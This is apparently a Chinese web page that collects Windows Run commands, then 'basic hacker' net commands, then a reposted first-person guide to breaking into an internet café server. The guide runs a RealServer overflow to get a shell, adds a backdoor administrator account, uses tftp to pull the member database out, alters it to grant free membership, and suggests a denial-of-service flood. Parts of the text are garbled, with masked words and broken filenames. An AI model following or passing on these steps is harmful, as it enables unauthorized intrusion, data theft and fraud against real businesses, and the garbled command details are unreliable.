電腦執行命令全集

winver---------檢查windows版本

開啟windows管理體系結構

wupdmgr--------windows更新程式

wscript--------windows指令碼宿主設定

write寫字板winmsd---------系統資訊

wiaacmgr-------掃瞄器和照相機嚮導

winchat--------xp自帶區域網聊天

顯示記憶體使用情況

系統配置實用程式

mplayer2-------簡易widnows media player

mspaint--------畫圖板

mstsc遠端桌面連線

mplayer2-------****機

magnify--------放大鏡實用程式

mmc開啟控制台

mobsync--------同步命令

dxdiag---------檢查directx資訊

drwtsn32------ 系統醫生

裝置管理器

磁碟碎片整理程式

磁碟管理實用程式

dcomcnfg-------開啟系統元件服務

ddeshare-------開啟dde共享設定

***play--------*****器

net stop messenger-----停止信使服務

net start messenger----開始信使服務

notepad--------開啟記事本

nslookup-------網路管理的工具嚮導

ntbackup-------系統備份和還原

narrator-------螢幕"講述人"

移動儲存管理器

移動儲存管理員操作請求

netstat -an----(tc)命令檢查介面

syncapp--------建立乙個公文包

sysedit--------系統配置編輯器

si**erif-------檔案簽名驗證程式

sndrec32-------錄音機

shrpubw--------建立共享資料夾

本地安全策略

syskey---------系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼本地服務設定

sndvol32-------音量控制程式

系統檔案檢查器

sfc /scannow---windows檔案保護

tsshutdn-------60秒倒計時關機命令

tourstart------xp簡介（安裝完成後出現的漫遊xp程式）

taskmgr--------任務管理器

eventvwr-------事件檢視器

eudcedit-------造字程式

explorer-------開啟資源管理器

packager-------物件包裝程式

計算機效能監測程式

progman--------程式管理器

登錄檔組策略結果集

regedt32-------登錄檔編輯器

rononce -p ----15秒關機

regsvr32 /u *.dll----停止dll檔案執行

regsvr32 /u 取消zip支援

命令提示符

磁碟檢查

證書管理實用程式

calc啟動計算器

charmap--------啟動字元對映表

cliconfg-------sql server 客戶端網路實用程式

clipbrd--------剪貼簿檢視器

conf啟動netmeeting

計算機管理

cleanmgr-------垃圾整理

索引服務程式

osk開啟螢幕鍵盤

odbcad32-------odbc資料來源管理器

oobe/msoobe /a----檢查xp是否啟用

本機使用者和組

logoff---------登出命令

iexpress-------木馬**工具，系統自帶

nslookup-------ip位址偵測器

共享資料夾管理器

utilman--------輔助工具管理器

組策略winnt命令大全

這些都是學黑客的基本入門命令：

win2000網路命令初步

1】ping

用來測試網路是否建立連線，獲取ip位址，也可以用來攻擊

ping -l 65500 -t 127.0.0.0『對某個位址連續傳送大小為65500大小的資料報，一直到它宕機，對98使用較好

2】netstat -a

檢視自己開的埠，常常用來手工檢視是否中了木馬，或者黑客程式

3】netstat -n

檢視自己機器正在和哪些機器的哪個埠進行連線

4】ftp

檔案傳送協議命令，與對方機器連線後上傳和**檔案

**對方的東西的格式：

get *.* c:\

上傳檔案：

put c:\*.*

5】net use

1 ipc$連線

net use \\127.0.0.1\ipc$ "123" /user:"admin"

密碼為123 使用者名稱 admin

2 退出ipc$

net use \127.0.0.1\ips$ /delte

3 把對方的共享的資料夾對映

net use z: \\127.0.0.1\c$

6】net time

檢視對方時間

net time \\127.0.0.1

7】指定時間執行對方機器中的程式

at \\127.0.0.1 12:30 *.exe

8】telnet

與對方做遠端連線

一般需要使用者名稱和密碼，你在它的機器安裝了木馬就簡單了

telnet 【ip】【埠】

9】net user

新增使用者命令

net user netdemon 123 /add

新增乙個使用者名為netdemon密碼為123的使用者

啟用guest

netuser guest /active:yes

10】提公升許可權

ner localgroup administrators netdemon /add

把netdemon提公升為管理員

11】net start

檢視機器開放的服務

可以啟動服務

net start telnet

啟動telnet服務

12】net stop

停止服務

net stop telnet

用來關閉服務

13】iisreset /reboot

重啟機器2k

14】finger

檢視對方最近有那些使用者登陸用來得到對方的使用者名稱

figer username @host

15】ipconfig

查機器有多少網絡卡：檢視本機器ip位址

入侵網咖伺服器!!!!!!

這是本人從別的地方貼上過來的，如果不行的話，可就不要怪我了喲！！！

宣告：本文只是告訴你可以這樣進入一台網咖伺服器，並沒有慫恿的意思，任何由本文引起的破壞網咖秩序的行為和作者與作者所在學校無關。本文可自由**，但請尊重作者版權，保持文章完整。

一直有寫些東西的衝動，只是太懶，從前寫些在網咖免費上網的東東，現在想想是該換些別的。有些東西放了太久很容易過時的。本文所提及的工具都可以在網上找到。

一、確定目標

首先要確定要攻擊的目標，即網咖伺服器的ip是多少。我所在網咖的客戶機裝的是windows 98+永珍2003，估計伺服器應該是windows 2k以上，用superscan 3.0掃了一下192.

168.0.1~192.

168.0.254這個範圍的135埠，只有乙個結果，往服務台瞅了一眼，確實只有一台伺服器沒有錯，目標確定。

二、開始入侵

既然伺服器開了135埠，那麼先用rpc服務緩衝區溢位漏洞溢位工具"rpc exploit gui"試試看，選擇目標為win2k（all）和winxp（all）都沒有成功，或許是打了補丁，也可能是借助天網防火牆之類的對135埠做了限制。開啟superscan，掃了一下192.168.

0.100（剛才掃出的伺服器內部ip位址）的"1~500"埠，結果顯示伺服器開了21（ftp），80（http），135（location service），139（netbios），445（microsoft-ds）埠，在ie位址列內輸入"",有個共享目錄backup，開啟瀏覽了一遍，東西挺多，只是有個永珍2003的安裝程式讓我不至於太失望。返回superscan，可以看到結果欄裡顯示伺服器用的是iis5.

1，可以確定目標伺服器用的是windows xp，看來用webd**x溢位xp的機子是沒希望了，用x-scan掃瞄伺服器網頁，報告發現.idq/.ida對映的溢位漏洞。

騙人的。其實對於iis5.1無效，想過利用x-way窮舉目標伺服器的密碼，但是很費時，我沒有太多時間，便放棄了。

又試著對伺服器的進行溢位。由於對方防火牆的阻擋，測試失敗。win98的客戶機實在不能利用目標伺服器的139埠做些什麼。

用"rpc exploit gui"溢位伺服器的139、445埠的成功率太低。先冷靜一會兒，滿著看目標伺服器的**做的如何，隨便點了一會兒，是個利用realplayer**的**電影**，想起來了，該服務不是開了個554（**流）埠嘛！剛才用superscan掃瞄時忘了，現在補充確認一下。

再用real服務緩衝區溢位漏洞溢位工具"thcrealbad"試試。這個漏洞不是很著名，管理員有可能不知道，我心裡想著，一會兒，提示溢位成功，並要求我連線到其31337埠，我終於看到了曙光，telnet上去，成功獲得伺服器的shell。

先做個賬號，這要用到幾條命令：（括號內為註解，不要輸入）

net user guest /active:yes（啟用賬戶guest）

net user guest 12345（把賬戶guest的密碼設為12345）

net localgroup administrators /add guest（把賬戶guest加到administrators組，具有最高許可權，預設為guests組）

由於伺服器用的是winxp，因此對映網路驅動器的方法是不行了，**tftpd32並執行（自己去網上找），把本地變成一台ftp伺服器，ftp目錄設為c盤根目錄，**開3389用的）到c盤根目錄（ftp目錄設在**就**到**）。回到溢位shell，把傳到伺服器，執行"tftp -i 192.168.

0.50 get c:\windows\system\注：

192.168.0.

50為本地機），傳過來了，再執行"djxyxs"程式，對方的3389埠就要開了（還要重啟），後門製作好了以後，來竊取伺服器的會員資料庫(這是本文的重點)，服務端一般是被裝在c盤的octopus目錄下，執行"tftp -i 192.168.0.

50 put c:\octopus\"（注：為永珍2003的會員資料庫），一盞茶的功夫（視資料庫的大小而定），資料庫**過來了，但是怎麼開啟呢？

可以用excel，但網咖裡不會裝這種玩意，記得伺服器的共享目錄backup裡有個永珍2003的安裝程式（在"百度"搜尋"永珍2003"可以找到），把它的服務端裝到本機d盤根目錄，用剛剛**到c盤的覆蓋掉本機"d:\octopus"目錄裡的空資料庫檔案，再執行服務端程式""可以看到本網咖的所有會員，接下來是自己新增會員，沒什麼好說的，可別告訴我你不會。再著是要把修改後的資料庫檔案傳回來，由於伺服器的永珍服務端是開著的，為避免發生衝突，切不可把修改過的資料庫檔案直接傳到目標的octopus目錄，要換一種方法，讓伺服器在重新啟動過程中替換掉那兩個檔案，方法如下：

1、編輯本機的在c盤的根目錄），刪掉所有內容。

2、輸入以下內容：（括號內為解釋，不要輸入）

@echo off（關閉螢幕回顯）

move c:\ c:\octopus（將本機c盤的資料庫檔案替換掉伺服器裡的資料庫檔案）

3、回到伺服器的shell，執行"tftp -i 192.168.0.50 get c:\"（用我們的自啟動檔案覆蓋掉伺服器的

4、最後是把修改過的資料庫檔案傳到伺服器，執行"tftp -i 192.168.0.50 get c:\"

接下來只需叫管理員把伺服器重啟一下就可以了（呵呵！管理員會聽你的嗎？）。

xp自帶乙個重啟的命令（shutdown），我在溢位的shell裡執行"shutdown -r"後，提示"許可權不夠，客戶機不能執行重啟命令"，算了吧！心急的可以來個拒絕服務攻擊。本篇寫的確實挺亂的，沒有什麼技術性可言，僅供一些人參考，寫得不好之處歡迎賜教.

- 作者： liufusan 2023年01月17日, 星期一 23:43　回覆（0） |　引用（0）加入博採

最詳細的黑客教程

如果你想學一些東東的話,一定要看這兒喲,就算你不想當黑客,你總要為你的電腦著想吧,來吧,到這兒來看看吧

第四章------關於命令的使用

簡單說明：

windowsnt/2000下有豐富的cmd可供使用，其作用也是巨大的。完全值得去熟練掌握她它們。windows2000本身就提供了詳細的命令幫助。

在開始選單--》幫助中可以搜尋到"windows 2000 命令參考"。強烈建議各位新手花些時間仔細看一遍。裝了比如iis等軟體，就會有新的命令（iisreset），在命令列方式下加/?

或-h引數可以檢視幫助，其他內建的命令當然也可以。還有就是掌握一些常用的dos命令也是非常有必要的。因為winsows不管發展到哪一天，它也都不可能取代dos，至少現在還不行。

net命令更是最常用的網路命令，想做乙個**，更是你所必需掌握的。掌握一些linux命令也是很有必要的。希望下面的資料對大家有所幫助。

電腦執行命令全集

電腦開始「執行」命令大全

win7執行命令大全

電腦義診執行規範

電腦執行命令全集

電腦開始「執行」命令大全

win7執行命令大全

電腦義診執行規範

相關推薦